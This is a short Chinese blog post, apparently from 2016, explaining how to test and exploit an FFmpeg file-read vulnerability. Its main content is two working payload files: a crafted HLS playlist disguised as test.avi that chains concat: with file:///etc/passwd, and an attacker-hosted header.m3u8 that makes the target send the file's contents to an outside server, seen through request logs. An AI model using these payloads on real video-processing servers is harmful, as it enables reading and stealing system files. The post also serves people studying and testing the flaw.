IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
  • 登录 注册

    FFmpeg文件读取漏洞测试及利用

    admin发表于 2016-05-06 09:25:08
    love 0

    昨天经历过ImageMagick命令执行漏洞的洗礼之后,今天又有FFmpeg文件读取漏洞,真是激情的一周啊!

    看了老外写的文章,大概理解的利用方式如下:

    #EXTM3U
    #EXT-X-MEDIA-SEQUENCE:0
    #EXTINF:10.0,
    concat:http://www.nxadmin.com/header.m3u8|file:///etc/passwd
    #EXT-X-ENDLIST

    以上内容保存成test.avi,是用来上传到被攻击服务器的。

    #EXTM3U
    #EXT-X-MEDIA-SEQUENCE:0
    #EXTINF:,
    http://www.nxadmin.com?

    以上内容保存成header.m3u8,将header.m3u8上传到你的服务器,然后把test.avi上传到攻击服务器,如果有漏洞,会收到如下的日志:

    ffmpeg文件读取漏洞

     

     

     

    会收到三条日志记录,第一条是请求header.m3u8文件的,第三条中就包含了读取的部分文件内容,说明是存在此漏洞的。

    header.m3u8文件的内容大概是将让你的web产生日志并且传回读取的文件内容。具体的参考老外写的分析文章:
    https://habrahabr.ru/company/mailru/blog/274855/

    还有ffmpeg的说明文档:

    https://www.ffmpeg.org/ffmpeg-protocols.html#concat

     



沪ICP备19023445号-2号
友情链接